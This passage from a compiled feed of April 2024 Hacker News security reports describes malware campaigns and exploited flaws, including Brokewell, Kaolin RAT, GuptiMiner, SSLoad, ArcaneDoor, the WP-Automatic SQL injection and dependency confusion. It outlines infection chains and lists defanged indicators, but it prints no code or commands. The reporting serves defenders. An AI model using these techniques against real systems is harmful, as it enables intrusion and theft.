to push a previously undocumented Android malware called Brokewell.
"Brokewell is a typical modern banking malware equipped with both data-stealing and remote-control capabilities built into the malware," Dutch security firm ThreatFabric said in an analysis published Thursday.
The malware is said to be in active development, adding new commands to capture touch events, textual information displayed on screen, and the applications a victim launches.
The list of Brokewell apps that masquerade as Google Chrome, ID Austria, and Klarna is as follows -
jcwAz.EpLIq.vcAZiUGZpK (Google Chrome)
zRFxj.ieubP.lWZzwlluca (ID Austria)
com.brkwl.upstracking (Klarna)
Like other recent Android malware families of
its kind, Brokewell is capable of getting around restrictions imposed by Google
that prevent sideloaded apps from requesting accessibility service permissions.
The banking trojan, once installed and launched for the first time, prompts the victim to grant permissions to the accessibility service, which it subsequently uses to automatically grant other permissions and carry out various malicious activities.
This includes displaying overlay screens on top of targeted apps to pilfer user credentials. It can also steal cookies by launching a WebView and loading the legitimate website, after which the session cookies are intercepted and transmitted to an actor-controlled server.
Some of the other features of Brokewell include the ability to record audio,
take screenshots, retrieve call logs, access device location, list installed
apps, record every every event happening on the device, send SMS messages, do
phone calls, install and uninstall apps, and even disable the accessibility
service.
The threat actors can also leverage the malware's remote control functionality to see what's displayed on screen in real-time, as well as interact with the device through clicks, swipes, and touches.
Brokewell is said to be the work of a developer who goes by the name "Baron Samedit Marais" and manages the "Brokewell Cyber Labs" project, which also includes an Android Loader publicly hosted on Gitea.
The loader is designed to act as a dropper that bypasses accessibility permissions restrictions in Android versions 13, 14, and 15 using a technique previously adopted by dropper-as-a-service (DaaS) offerings like SecuriDropper and deploy the trojan implant.
By default, the loader apps generated through this process have the package name "com.brkwl.apkstore," although this can configured by the user by either providing a specific name or enabling the random package name generator.
The free availability of the loader means it could be embraced by other threat actors looking to sidestep Android's security protections.
"Second, existing 'Dropper-as-a-Service' offerings that currently provide this capability as a distinctive feature will likely either close their services or attempt to reorganize," ThreatFabric said.
"This further lowers the entry barrier for cybercriminals looking to distribute mobile malware on modern devices, making it easier for more actors to enter the field."
Update#
A Google spokesperson shared the below statement with The Hacker News
-
"Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play."
Palo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack
27.4.24
Vulnerebility
The Hacker News
Palo Alto Networks has shared
remediation guidance for a recently disclosed critical security flaw impacting
PAN-OS that has come under active exploitation.
The vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), could be weaponized to obtain unauthenticated remote shell command execution on susceptible devices. It has been addressed in multiple versions of PAN-OS 10.2.x, 11.0.x, and 11.1.x.
There is evidence to suggest that the issue has been exploited as a zero-day since at least March 26, 2024, by a threat cluster tracked as UTA0218.
The activity, codenamed Operation MidnightEclipse, entails the use of the flaw to drop a Python-based backdoor called UPSTYLE that's capable of executing commands transmitted via specially crafted requests.
The intrusions have not been linked to a known threat actor or group, but it's suspected to be a state-backed hacking crew given the tradecraft and the victimology observed.
The latest remediation advice offered by Palo Alto Networks is based on the extent of compromise -
Level 0 Probe: Unsuccessful exploitation attempt - Update to the latest provided
hotfix
Level 1 Test: Evidence of vulnerability being tested on the device,
including the creation of an empty file on the firewall but no execution of
unauthorized commands - Update to the latest provided hotfix
Level 2
Potential Exfiltration: Signs where files like "running_config.xml" are copied
to a location that is accessible via web requests - Update to the latest
provided hotfix and perform a Private Data Reset
Level 3 Interactive access:
Evidence of interactive command execution, such as the introduction of backdoors
and other malicious code - Update to the latest provided hotfix and perform a
Factory Reset
"Performing a private data reset eliminates risks of potential
misuse of device data," Palo Alto Networks said. "A factory reset is recommended
due to evidence of more invasive threat actor activity."
Hackers Exploiting WP-Automatic Plugin Bug to Create Admin Accounts on WordPress
Sites
27.4.24
Exploit
The Hacker News
Threat actors are attempting to
actively exploit a critical security flaw in the ValvePress Automatic plugin for
WordPress that could allow site takeovers.
The shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin prior to 3.92.0. The issue has been resolved in version 3.92.1 released on February 27, 2024, although the release notes make no mention of it.
"This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as attackers can exploit it to gain unauthorized access to websites, create admin‑level user accounts, upload malicious files, and potentially take full control of affected sites," WPScan said in an alert this week.
According to the Automattic-owned company, the issue is rooted in the plugin's user authentication mechanism, which can be trivially circumvented to execute arbitrary SQL queries against the database by means of specially crafted requests.
In the attacks observed so far, CVE-2024-27956 is being used to unauthorized database queries and create new admin accounts on susceptible WordPress sites (e.g., names starting with "xtw"), which could then be leveraged for follow-on post-exploitation actions.
This includes installing plugins that make it possible to upload files or edit code, indicating attempts to repurpose the infected sites as stagers.
"Once a WordPress site is compromised, attackers ensure the longevity of their access by creating backdoors and obfuscating the code," WPScan said. "To evade detection and maintain access, attackers may also rename the vulnerable WP‑Automatic file, making it difficult for website owners or security tools to identify or block the issue."
The file in question is "/wp‑content/plugins/wp‑automatic/inc/csv.php," which is renamed to something like "/wp‑content/plugins/wp‑automatic/inc/csv65f82ab408b3.php."
That said, it's possible that the threat actors are doing so in an attempt to prevent other attackers from exploiting the sites already under their control.
CVE-2024-27956 was publicly disclosed by WordPress security firm Patchstack on March 13, 2024. Since then, more than 5.5 million attack attempts to weaponize the flaw have been detected in the wild.
The disclosure comes as severe bugs have been disclosed in plugins like Email Subscribers by Icegram Express (CVE-2024-2876, CVSS score: 9.8), Forminator (CVE-2024-28890, CVSS score: 9.8), and User Registration (CVE-2024-2417, CVSS score: 8.8) that could be used to extract sensitive data like password hashes from the database, upload arbitrary files, and grant an authenticator user admin privileges.
Patchstack has also warned of an unpatched issue in the Poll Maker plugin (CVE-2024-32514, CVSS score: 9.9) that allows for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server, leading to remote code execution.
North Korea's Lazarus Group Deploys New Kaolin RAT via Fake Job Lures
27.4.24
Virus
The Hacker News
The North Korea-linked threat actor
known as Lazarus Group employed its time-tested fabricated job lures to deliver
a new remote access trojan called Kaolin RAT as part of attacks targeting
specific individuals in the Asia region in summer 2023.
The malware could, "aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from [command-and-control] server," Avast security researcher Luigino Camastra said in a report published last week.
The RAT acts as a pathway to deliver the FudModule rootkit, which has been recently observed leveraging a now-patched admin-to-kernel exploit in the appid.sys driver (CVE-2024-21338, CVSS score: 7.8) to obtain a kernel read/write primitive and ultimately disable security mechanisms.
The Lazarus Group's use of job offer lures to infiltrate targets is not new. Dubbed Operation Dream Job, the long-running campaign has a track record of using various social media and instant messaging platforms to deliver malware.
These initial access vectors trick targets into launching a malicious optical disc image (ISO) file bearing three files, one of which masquerades as an Amazon VNC client ("AmazonVNC.exe") that, in reality, is a renamed version of a legitimate Windows application called "choice.exe."
The two other files, named "version.dll" and "aws.cfg," act as a catalyst to kick-start the infection chain. Specifically, the executable "AmazonVNC.exe" is used to side-load "version.dll," which, in turn, spawns an IExpress.exe process and injects into it a payload residing within "aws.cfg."
The payload is designed to download shellcode from a command-and-control (C2) domain ("henraux[.]com"), which is suspected to be an actual-but-hacked website belonging to an Italian company that specializes in excavating and processing marble and granite.
While the exact nature of the shellcode is unclear, it's said to be used to launch RollFling, a DLL-based loader that serves to retrieve and launch the next-stage malware named RollSling, which was disclosed by Microsoft last year in connection with a Lazarus Group campaign exploiting a critical JetBrains TeamCity flaw (CVE-2023-42793, CVSS score: 9.8).
RollSling, executed directly in memory in a likely attempt to evade detection by security software, represents the next phase of the infection procedure. Its primary function is to trigger the execution of a third loader dubbed RollMid that's also run in the system's memory.
RollMid comes fitted with capabilities to set the stage for the attack and
establish contact with a C2 server, which involves a three-step process of its
own as follows -
Communicate with the first C2 server to fetch a HTML file containing the address
of the second C2 server
Communicate with the second C2 server to fetch a PNG
image that embeds a malicious component using a technique called steganography
Transmit data to the third C2 server using the address specified in the
concealed data within the image
Retrieve an additional Base64-encoded data
blob from the third C2 server, which is the Kaolin RAT
The technical
sophistication behind the multi-stage sequence, while no doubt complex and
intricate, borders on overkill, Avast opined, with the Kaolin RAT paving the way
for the deployment of the FudModule rootkit after setting up communications with
the RAT's C2 server.
On top of that, the malware is equipped to enumerate files; carry out file operations; upload files to the C2 server; alter a file's last modified timestamp; enumerate, create, and terminate processes; execute commands using cmd.exe; download DLL files from the C2 server; and connect to an arbitrary host.
"The Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products," Camastra said.
"It is evident that they invested significant resources in developing such a complex attack chain. What is certain is that Lazarus had to innovate continuously and allocate enormous resources to research various aspects of Windows mitigations and security products. Their ability to adapt and evolve poses a significant challenge to cybersecurity efforts."
DOJ Arrests Founders of Crypto Mixer Samourai for $2 Billion in Illegal
Transactions
27.4.24
Cryptocurrency
The Hacker News
The U.S. Department of Justice
(DoJ) on Wednesday announced the arrest of two co-founders of a cryptocurrency
mixer called Samourai and seized the service for allegedly facilitating over $2
billion in illegal transactions and for laundering more than $100 million in
criminal proceeds.
To that end, Keonne Rodriguez, 35, and William Lonergan Hill, 65, have been charged with conspiracy to commit money laundering and conspiracy to operate an unlicensed money transmitting business from 2015 through February 2024. Rodriguez and Hill face a maximum sentence of 25 years in prison each.
Rodriguez, the CEO of the company, and CTO Hill intentionally designed Samourai to help "criminals to engage in large-scale money laundering and sanctions evasion," while ostensibly marketing as a privacy-oriented service, the DoJ said.
Samourai laundered money from illegal dark web marketplaces, including Silk Road and Hydra, as well as spear-phishing schemes and scams aimed at defrauding multiple decentralized finance protocols.
The operation, which also involved law enforcement agencies from Iceland and Portugal, along with Europol, saw its digital infrastructure confiscated and its Android app pulled from the Google Play Store in the U.S. Hill, who was apprehended in Portugal, is awaiting his extradition to the U.S. Rodriguez was taken into custody in Pennsylvania.
Samourai offered a cryptocurrency mixing service known as Whirlpool to help users conceal the cryptocurrency transaction trail, in addition to incorporating an "exclusive transaction type" called Ricochet Send that made it possible to add intermediate hops when sending cryptocurrency from one address to another.
Whirlpool was advertised as a way to "mathematically disassociate the ownership of inputs to outputs in a given bitcoin transaction," which they claimed increases the privacy of the users involved, protects against financial surveillance, and improves the fungibility of the Bitcoin network.
"Ricochet defends against bitcoin blacklists by adding additional decoy transactions between the initial send and eventual recipient," according to the official documentation. "You should consider using Ricochet when sending to Bitcoin Exchanges, and companies that are known to close accounts for flimsy reasons."
The feature is engineered to prevent law enforcement and/or cryptocurrency exchanges from recognizing that a particular batch of cryptocurrency originated from criminal activity, the DoJ alleged.
Besides openly courting users (e.g., Russian oligarchs) to circumvent sanctions and launder criminal proceeds through Samourai on their X (formerly Twitter) account, the defendants have also been found transmitting to investors marketing materials that described how its user base was intended to include online gamblers and criminals who need the anonymity to conduct their illegal activities.
"Rodriguez and Hill acknowledge that its revenues will be derived from 'Dark/Grey Market participants' seeking to 'swap their bitcoins with multiple parties' to avoid detection," the DoJ said.
The arrests come weeks after a former security engineer named Shakeeb Ahmed was sentenced to three years in prison in the U.S. for charges relating to hacking two decentralized cryptocurrency exchanges in July 2022 and stealing over $12.3 million, which were then laundered using Samourai Whirlpool.
Google Postpones Third-Party Cookie Deprecation Amid U.K. Regulatory Scrutiny
27.4.24
Security
The Hacker News
Google has once again pushed its
plans to deprecate third-party tracking cookies in its Chrome web browser as it
works to address outstanding competition concerns from U.K. regulators over its
Privacy Sandbox initiative.
The tech giant said it's working closely with the U.K. Competition and Markets Authority (CMA) and hopes to achieve an agreement by the end of the year.
As part of the new timeline, it aims to start phasing out third-party cookies early next year, making it the third such extension since the tech giant announced the plans in 2020, postponing it from early 2022 to late 2023, and again to the second half of 2024.
Privacy Sandbox refers to a set of initiatives that offers privacy-preserving alternatives to tracking cookies and cross-app identifiers in order to serve tailored ads to users.
While Google has since enabled the features to a subset of Chrome browser users as of last year, the U.K. watchdog, alongside the Information Commissioner's Office (ICO), has been keeping a close eye on the implementation to ensure that Privacy Sandbox benefits consumers and doesn't favor Google's own advertising tech.
Both Apple and Mozilla have discontinued support for third-party cookies in their respective web browsers as of early 2020.
"We recognize that there are ongoing challenges related to reconciling divergent feedback from the industry, regulators and developers, and will continue to engage closely with the entire ecosystem," Google said in an update.
"It's also critical that the CMA has sufficient time to review all evidence including results from industry tests, which the CMA has asked market participants to provide by the end of June."
In a setback for Google, a draft report from the ICO revealed that the company's proposed replacements have gaps that advertisers could exploit to identify users, effectively undermining the privacy and anonymity objectives, according to the Wall Street Journal last week.
The development comes as Google said it's updating client-side encrypted (CSE) Google Meet calls to include support for inviting external participants, including those without a Google account.
Major Security Flaws Expose Keystrokes of Over 1 Billion Chinese Keyboard App
Users
25.4.24
Vulnerebility
The Hacker News
Security vulnerabilities uncovered
in cloud-based pinyin keyboard apps could be exploited to reveal users'
keystrokes to nefarious actors.
The findings come from the Citizen Lab, which discovered weaknesses in eight of nine apps from vendors like Baidu, Honor, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi. The only vendor whose keyboard app did not have any security shortcomings is that of Huawei's.
The vulnerabilities could be exploited to "completely reveal the contents of users' keystrokes in transit," researchers Jeffrey Knockel, Mona Wang, and Zoë Reichert said.
The disclosure builds upon prior research from the interdisciplinary laboratory based at the University of Toronto, which identified cryptographic flaws in Tencent's Sogou Input Method last August.
Collectively, it's estimated that close to one billion users are affected by this class of vulnerabilities, with Input Method Editors (IMEs) from Sogou, Baidu, and iFlytek accounting for a huge chunk of the market share.
A summary of the identified issues is as follows -
Tencent QQ Pinyin, which is vulnerable to a CBC padding oracle attack that could
make it possible to recover plaintext
Baidu IME, which allows network
eavesdroppers to decrypt network transmissions and extract the typed text on
Windows owing to a bug in the BAIDUv3.1 encryption protocol
iFlytek IME,
whose Android app allows network eavesdroppers to recover the plaintext of
insufficiently encrypted network transmissions
Samsung Keyboard on Android,
which transmits keystroke data via plain, unencrypted HTTP
Xiaomi, which
comes preinstalled with keyboard apps from Baidu, iFlytek, and Sogou (and
therefore susceptible to the same aforementioned flaws)
OPPO, which comes
preinstalled with keyboard apps from Baidu and Sogou (and therefore susceptible
to the same aforementioned flaws)
Vivo, which comes preinstalled with Sogou
IME (and therefore susceptible to the same aforementioned flaw)
Honor, which
comes preinstalled with Baidu IME (and therefore susceptible to the same
aforementioned flaw)
Successful exploitation of these vulnerabilities could
permit adversaries to decrypt Chinese mobile users' keystrokes entirely
passively without sending any additional network traffic. Following responsible
disclosure, every keyboard app developer with the exception of Honor and Tencent
(QQ Pinyin) have addressed the issues as of April 1, 2024.
Users are advised to keep their apps and operating systems up-to-date and switch to a keyboard app that entirely operates on-device to mitigate these privacy issues.
Other recommendations call on app developers to use well-tested and standard encryption protocols instead of developing homegrown versions that could have security problems. App store operators have also been urged not to geoblock security updates and allow developers to attest to all data being transmitted with encryption.
The Citizen Lab theorized it's possible that Chinese app developers are less inclined to use "Western" cryptographic standards owing to concerns that they may contain backdoors of their own, prompting them to develop in-house ciphers.
"Given the scope of these vulnerabilities, the sensitivity of what users type on their devices, the ease with which these vulnerabilities may have been discovered, and that the Five Eyes have previously exploited similar vulnerabilities in Chinese apps for surveillance, it is possible that such users' keystrokes may have also been under mass surveillance," the researchers said.
eScan Antivirus Update Mechanism Exploited to Spread Backdoors and Miners
25.4.24
Virus
The Hacker News
A new malware campaign has been
exploiting the updating mechanism of the eScan antivirus software to distribute
backdoors and cryptocurrency miners like XMRig through a long-standing threat
codenamed GuptiMiner targeting large corporate networks.
Cybersecurity firm Avast said the activity is the work of a threat actor with possible connections to a North Korean hacking group dubbed Kimsuky, which is also known as Black Banshee, Emerald Sleet, and TA427.
"GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attacker's DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others," Avast said.
The intricate and elaborate infection chain, at its core, leverages a security shortcoming in the update mechanism of Indian antivirus vendor eScan to propagate the malware by means of an adversary-in-the-middle (AitM) attack.
Specifically, it entails hijacking the updates by substituting the package file with a malicious version by taking advantage of the fact that the downloads were not signed and secured using HTTPS. The issue, which went unnoticed for at least five years, has been rectified as of July 31, 2023.
The rogue DLL ("updll62.dlz") executed by the eScan software side-loads a DLL ("version.dll") to activate a multi-stage sequence starting with a PNG file loader that, in turn, employs malicious DNS servers to contact a command-and-control (C2) server and fetch a PNG file with appended shellcode.
"GuptiMiner hosts their own DNS servers for serving true destination domain addresses of C&C servers via DNS TXT responses," researchers Jan Rubín and Milánek said.
"As the malware connects to the malicious DNS servers directly, the DNS protocol is completely separated from the DNS network. Thus, no legitimate DNS server will ever see the traffic from this malware."
The PNG file is then parsed to extract the shellcode, which is then responsible for executing a Gzip loader that's designed to decompress another shellcode using Gzip and execute it in a separate thread.
The third-stage malware, dubbed Puppeteer, pulls all the strings, ultimately deploying the XMRig cryptocurrency miner and backdoors on the infected systems.
Avast said it encountered two different types of backdoors that come fitted with
features to enable lateral movement, accept commands from the threat actor, and
deliver additional components as required.
"The first is an enhanced build of PuTTY Link, providing SMB scanning of the local network and enabling lateral movement over the network to potentially vulnerable Windows 7 and Windows Server 2008 systems on the network," the researchers explained.
"The second backdoor is multi-modular, accepting commands from the attacker to install more modules as well as focusing on scanning for stored private keys and crypto wallets on the local system."
The deployment of XMRig has been described as "unexpected" for what's otherwise a complex and meticulously executed operation, raising the possibility that the miner acts as a distraction to prevent victims from discovering the true extent of the compromise.
GuptiMiner, known to be active since at least 2018, also makes use of various techniques like anti-VM and anti-debug tricks, code virtualization, dropping the PNG loader during system shutdown events, storing payloads in Windows Registry, and adding a root certificate to Windows' certificate store to make the PNG loader DLLs appear trustworthy.
The links to Kimusky come from an information stealer that, while not distributed by GuptiMiner or via the infection flow, has been used "across the whole GuptiMiner campaign" and shares overlaps with a keylogger previously identified as utilized by the group.
It's currently not clear who the targets of the campaign are, but GuptiMiner artifacts have been uploaded to VirusTotal from India and Germany as early as April 2018, with Avast telemetry data highlighting new infections likely originating from out-of-date eScan clients.
The findings come as the Korean National Police Agency (KNPA) called out North Korean hacking crews such as Lazarus, Andariel, and Kimsuky for targeting the defense sector in the country and exfiltrating valuable data from some of them.
A report from the Korea Economic Daily said the threat actors penetrated the networks of 83 South Korean defense contractors and stole confidential information from about 10 of them from October 2022 to July 2023.
U.S. Treasury Sanctions Iranian Firms and Individuals Tied to Cyber Attacks
25.4.24
BigBrothers
The Hacker News
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Monday sanctioned two firms and four individuals for their involvement in malicious cyber activities on behalf of the Iranian Islamic Revolutionary Guard Corps Cyber Electronic Command (IRGC-CEC) from at least 2016 to April 2021.
This includes the front companies Mehrsam Andisheh Saz Nik (MASN) and Dadeh Afzar Arman (DAA), as well as the Iranian nationals Alireza Shafie Nasab, Reza Kazemifar Rahman, Hossein Mohammad Harooni, and Komeil Baradaran Salmani.
"These actors targeted more than a dozen U.S. companies and government entities through cyber operations, including spear-phishing and malware attacks," the Treasury Department said.
Concurrent with the sanctions, the U.S. Department of Justice (DoJ) unsealed an indictment against the four individuals for orchestrating cyber attacks targeting the U.S. government and private entities.
Furthermore, a reward of up to $10 million has been announced as part of the U.S. Department of State's Rewards for Justice program for information leading to the identification or location of the group and the defendants.
It's worth noting that Nasab, who worked for MASN, was charged in a previous indictment that was unsealed on February 29, 2024. The defendants remain at large.
Rahman, also employed by MASN, is alleged to have worked on testing malware intended to target job seekers with a focus on military veterans. He also purportedly worked for the Iranian Organization for Electronic Warfare and Cyber Defense (EWCD), a component of IRGC, from about 2014 through 2020.
MASN (formerly Mahak Rayan Afraz and Dehkadeh Telecommunication and Security Company) is tracked by the cybersecurity community under the name Tortoiseshell and is one of the many contracting companies that act as a cover for malicious campaigns orchestrated by IRGC. It was liquidated in June 2023.
The U.S. Treasury Department said the second sanctioned company also "engaged in malicious cyber campaigns on behalf of the IRGC-CEC," noting that Harooni was employed by DAA and has carried out spear-phishing and social engineering attacks against U.S. organizations.
Salmani is said to be associated with multiple IRGC-CEC front companies, including MASN, and involved in spear-phishing campaigns targeting U.S. entities. Nasab, Harooni, and Salmani have also been responsible for procuring and maintaining the online network infrastructure used to facilitate the intrusions, the DoJ said.
In all, in the coordinated multi-year hacking spree, the defendants primarily singled out private sector defense contractors and other government entities, ultimately compromising more than 200,000 employee accounts.
Each of the defendants has been charged with conspiracy to commit computer fraud, conspiracy to commit wire fraud, and wire fraud. If convicted, they face up to five years in prison for the computer fraud conspiracy, and up to 20 years in prison for each count of wire fraud and conspiracy to commit wire fraud.
Furthermore, Harooni has been charged with knowingly damaging a protected computer, which carries a maximum penalty of 10 years in prison. Nasab, Harooni, and Salmani have also been charged with aggravated identity theft, which carries a mandatory consecutive term of two years in prison.
"Criminal activity originating from Iran poses a grave threat to America's national security and economic stability," said Attorney General Merrick B. Garland in a statement.
"These defendants are alleged to have engaged in a coordinated, multi-year hacking campaign from Iran targeting more than a dozen American companies and the U.S. Treasury and State Departments."
The development comes amid geopolitical tensions in the Middle East after an Israeli air strike bombed Iran's embassy in Syria, prompting the latter to launch a drone-and-missile attack on Israel, which, in turn, led to an Israeli missile strike hitting an air defense radar system near Isfahan.
Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt
Strike
25.4.24
APT
The Hacker News
Cybersecurity researchers have
discovered an ongoing attack campaign that's leveraging phishing emails to
deliver malware called SSLoad.
The campaign, codenamed FROZEN#SHADOW by Securonix, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software.
"SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.
"Once inside the system, SSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection."
Attack chains involve the use of phishing messages to randomly target organizations in Asia, Europe, and the Americas, with emails containing links that lead to the retrieval of a JavaScript file that kicks off the infection flow.
Earlier this month, Palo Alto Networks uncovered at least two different methods by which SSLoad is distributed, one which entails the use of website contact forms to embed booby-trapped URLs and another involving macro-enabled Microsoft Word documents.
The latter is also notable for the fact that malware acts as a conduit for delivering Cobalt Strike, while the former has been used to deliver a different malware called Latrodectus, a likely successor to IcedID.
The obfuscated JavaScript file ("out_czlrh.js"), when launched and run using wscript.exe, retrieves an MSI installer file ("slack.msi") by connecting to a network share located at "\\wireoneinternet[.]info@80\share\" and runs it using msiexec.exe.
The MSI installer, for its part, contacts an attacker-controlled domain to fetch and execute the SSLoad malware payload using rundll32.exe, following which it beacons to a command-and-control (C2) server along with information about the compromised system.
The initial reconnaissance phase paves the way for Cobalt Strike, a legitimate adversary simulation software, which is then used to download and install ScreenConnect, thereby allowing the threat actors to remotely commandeer the host.
"With full access to the system the threat actors began attempting to acquire credentials and gather other critical system details," the researchers said. "At this stage they started scanning the victim host for credentials stored in files as well as other potentially sensitive documents."
The attackers have also been observed pivoting to other systems in the network, including the domain controller, ultimately infiltrating the victim's Windows domain by creating their own domain administrator account.
"With this level of access, they could get into any connected machine within the domain," the researchers said. "In the end, this is the worst case scenario for any organization as this level of persistence achieved by the attackers would be incredibly time consuming and costly to remediate."
The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that Linux systems are being infected with an open-source remote access trojan called Pupy RAT.
State-Sponsored Hackers Exploit Two Cisco Zero-Day Vulnerabilities for Espionage
25.4.24
APT
The Hacker News
A new malware campaign leveraged
two zero-day flaws in Cisco networking gear to deliver custom malware and
facilitate covert data collection on target environments.
Cisco Talos, which dubbed the activity ArcaneDoor, attributing it as the handiwork of a previously undocumented sophisticated state-sponsored actor it tracks under the name UAT4356 (aka Storm-1849 by Microsoft).
"UAT4356 deployed two backdoors as components of this campaign, 'Line Runner' and 'Line Dancer,' which were used collectively to conduct malicious actions on-target, which included configuration modification, reconnaissance, network traffic capture/exfiltration and potentially lateral movement," Talos said.
The intrusions, which were first detected and confirmed in early January 2024, entail the exploitation of two vulnerabilities -
CVE-2024-20353 (CVSS score: 8.6) - Cisco Adaptive Security Appliance and
Firepower Threat Defense Software Web Services Denial-of-Service Vulnerability
CVE-2024-20359 (CVSS score: 6.0) - Cisco Adaptive Security Appliance and
Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
It's worth noting that a zero-day exploit is the technique or attack a malicious
actor deploys to leverage an unknown security vulnerability to gain access into
a system.
While the second flaw allows a local attacker to execute arbitrary code with root-level privileges, administrator-level privileges are required to exploit it. Addressed alongside CVE-2024-20353 and CVE-2024-20359 is a command injection flaw in the same appliance (CVE-2024-20358, CVSS score: 6.0) that was uncovered during internal security testing.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the shortcomings to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the vendor-provided fixes by May 1, 2024.
The exact initial access pathway used to breach the devices is presently
unknown, although UAT4356 is said to have started preparations for it as early
as July 2023.
A successful foothold is followed by the deployment of two implants named Line Dancer and Line Runner, the former of which is an in-memory backdoor that enables attackers to upload and execute arbitrary shellcode payloads, including disabling system logs and exfiltrating packet captures.
Line Runner, on the other hand, is a persistent HTTP-based Lua implant installed on the Cisco Adaptive Security Appliance (ASA) by leveraging the aforementioned zero-days such that it can survive across reboots and upgrades. It has been observed being used to fetch information staged by Line Dancer.
"It is suspected that Line Runner may be present on a compromised device even if Line Dancer is not (e.g., as a persistent backdoor, or where an impacted ASA has not yet received full operational attention from the malicious actors)," according to a joint advisory published by cybersecurity agencies from Australia, Canada, and the U.K.
At every phase of the attack, UAT4356 is said to have demonstrated meticulous attention to hiding digital footprints and the ability to employ intricate methods to evade memory forensics and lower the chances of detection, contributing to its sophistication and elusive nature.
This also suggests that the threat actors have a complete understanding of the inner workings of the ASA itself and of the "forensic actions commonly performed by Cisco for network device integrity validation."
Exactly which country is behind ArcaneDoor is unclear, however both Chinese and Russian state-backed hackers have targeted Cisco routers for cyber espionage purposes in the past. Cisco Talos also did not specify how many customers were compromised in these attacks.
The development once again highlights the increased targeting of edge devices and platforms such as email servers, firewalls, and VPNs that traditionally lack endpoint detection and response (EDR) solutions, as evidenced by the recent string of attacks targeting Barracuda Networks, Fortinet, Ivanti, Palo Alto Networks, and VMware.
"Perimeter network devices are the perfect intrusion point for espionage-focused campaigns," Talos said.
"As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications."
CoralRaider Malware Campaign Exploits CDN Cache to Spread Info-Stealers
24.4.24
Virus
The Hacker News
A new ongoing malware campaign has been observed distributing three different stealers, such as CryptBot, LummaC2, and Rhadamanthys hosted on Content Delivery Network (CDN) cache domains since at least February 2024.
Cisco Talos has attributed the activity with moderate confidence to a threat actor tracked as CoralRaider, a suspected Vietnamese-origin group that came to light earlier this month.
This assessment is based on "several overlaps in tactics, techniques, and procedures (TTPs) of CoralRaider's Rotbot campaign, including the initial attack vector of the Windows Shortcut file, intermediate PowerShell decryptor and payload download scripts, the FoDHelper technique used to bypass User Access Controls (UAC) of the victim machine," the company said.
Targets of the campaign span various business verticals across geographies, including the U.S., Nigeria, Pakistan, Ecuador, Germany, Egypt, the U.K., Poland, the Philippines, Norway, Japan, Syria, and Turkey.
Attack chains involve users downloading files masquerading as movie files via a web browser, raising the possibility of a large-scale attack.
"This threat actor is using a Content Delivery Network (CDN) cache to store the malicious files on their network edge host in this campaign, avoiding request delay," Talos researchers Joey Chen, Chetan Raghuprasad, and Alex Karkins said. "The actor is using the CDN cache as a download server to deceive network defenders."
The initial access vector for the drive-by downloads is suspected to be phishing
emails, using them as a conduit to propagate booby-trapped links pointing to ZIP
archives containing a Windows shortcut (LNK) file.
The shortcut file, in turn, runs a PowerShell script to fetch a next-stage HTML application (HTA) payload hosted on the CDN cache, which subsequently runs Javascript code to launch an embedded PowerShell loader that takes steps to fly under the radar and ultimately downloads and runs one of the three stealer malware.
The modular PowerShell loader script is designed to bypass the User Access Controls (UAC) in the victim's machine using a known technique called FodHelper, which has also been put to use by Vietnamese threat actors linked to another stealer known as NodeStealer that's capable of stealing Facebook account data.
The stealer malware, regardless of what's deployed, grabs victims' information, such as system and browser data, credentials, cryptocurrency wallets, and financial information.
What's notable about the campaign is that it utilizes an updated version of CryptBot that packs in new anti-analysis techniques and also captures password manager application databases and authenticator application information.
Apache Cordova App Harness Targeted in Dependency Confusion Attack
24.4.24
Hacking
The Hacker News
Researchers have identified a
dependency confusion vulnerability impacting an archived Apache project called
Cordova App Harness.
Dependency confusion attacks take place owing to the fact that package managers check the public repositories before private registries, thus allowing a threat actor to publish a malicious package with the same name to a public package repository.
This causes the package manager to inadvertently download the fraudulent package from the public repository instead of the intended private repository. If successful, it can have serious consequences, such as installing all downstream customers that install the package.
A May 2023 analysis of npm and PyPI packages stored in cloud environments by enterprise security company Orca revealed that nearly 49% of organizations are vulnerable to a dependency confusion attack.
While npm and other package managers have since introduced fixes to prioritize the private versions, application security firm Legit Security said it found the Cordova App Harness project to reference an internal dependency named cordova-harness-client without a relative file path.
The open-source initiative was discontinued by the Apache Software Foundation (ASF) as of April 18, 2019.
As Legit Security demonstrated, this left the door wide open for a supply chain attack by uploading a malicious version under the same name with a higher version number, thus causing npm to retrieve the bogus version from the public registry.
With the bogus package attracting over 100 downloads after being uploaded to
npm, it indicates that the archived project is still being put to use, likely
posing severe risks to users.
In a hypothetical attack scenario, an attacker could hijack the library to serve malicious code that could be executed on the target host upon package installation.
The Apache security team has since addressed the problem by taking ownership of the cordova-harness-client package. It's worth noting that organizations are advised to create public packages as placeholders to prevent dependency confusion attacks.
"This discovery highlights the need to consider third-party projects and dependencies as potential weak links in the software development factory, especially archived open-source projects that may not receive regular updates or security patches," security researcher Ofek Haviv said.
